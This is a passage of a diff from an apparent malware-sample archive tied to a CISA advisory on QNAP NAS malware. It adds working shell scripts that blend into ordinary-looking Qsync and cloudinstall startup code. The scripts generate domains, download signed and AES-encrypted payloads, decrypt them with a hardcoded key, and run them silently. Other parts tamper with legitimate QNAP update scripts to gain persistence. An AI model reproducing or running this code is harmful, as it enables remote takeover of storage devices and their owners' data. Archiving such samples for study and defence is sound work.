hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
echo "$outfile https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)" > /tmp/hellomalware.txt
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/6e0f793025537edf285c5749b3fcd83a689db0f1c697abe70561399938380f89
Normal file
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/6e0f793025537edf285c5749b3fcd83a689db0f1c697abe70561399938380f89
Normal file
Binary file not shown.
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/845759bb54b992a6abcbca4af9662e94794b8d7c87063387b05034ce779f7d52
Normal file
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/845759bb54b992a6abcbca4af9662e94794b8d7c87063387b05034ce779f7d52
Normal file
Binary file not shown.
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/8fd16e639f99cdaa7a2b730fc9af34a203c41fb353eaa250a536a09caf78253b
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/8fd16e639f99cdaa7a2b730fc9af34a203c41fb353eaa250a536a09caf78253b
Normal file
File diff suppressed because one or more lines are too long
926
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9526ccdeb9bf7cfd9b34d290bdb49ab6a6acefc17bff0e85d9ebb46cca8b9dc2
Normal file
926
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9526ccdeb9bf7cfd9b34d290bdb49ab6a6acefc17bff0e85d9ebb46cca8b9dc2
Normal file
@ -0,0 +1,926 @@
|
||||
#!/bin/sh
|
||||
{
|
||||
ts=1558069200
|
||||
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
|
||||
test -d "$bdir" && break; bdir=''
|
||||
done <<EOF
|
||||
$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
|
||||
EOF
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
|
||||
|
||||
test -z "$PWD" && PWD=$(pwd)
|
||||
CWD="$PWD"
|
||||
if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
|
||||
CWD=''
|
||||
for dir in '.config' '.liveupdate'; do
|
||||
dir="${bdir}/.qpkg/${dir}"
|
||||
test -d "$dir" && cd "$dir" && CWD="$dir" && break
|
||||
done
|
||||
fi
|
||||
test "$CWD" && test -d "$CWD" && cd "$CWD"
|
||||
|
||||
sedreplace () {
|
||||
local grepstring="$1" sedcmd="$2" file="$3"
|
||||
[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
|
||||
if grep "$grepstring" "$file"; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
sed -i "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
return $?
|
||||
}
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
file=''
|
||||
[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
|
||||
if [ "x${file}" != 'x' ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
if [ ! -f '1550379600_c' ]; then
|
||||
touch '1550379600_c'
|
||||
test -f liveupdate.sh && { dir=.liveupdate; file=liveupdate.sh; } || { test -f backup_conf.sh && dir=.config; file=backup_conf.sh; }
|
||||
cat >".backup_${file}" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
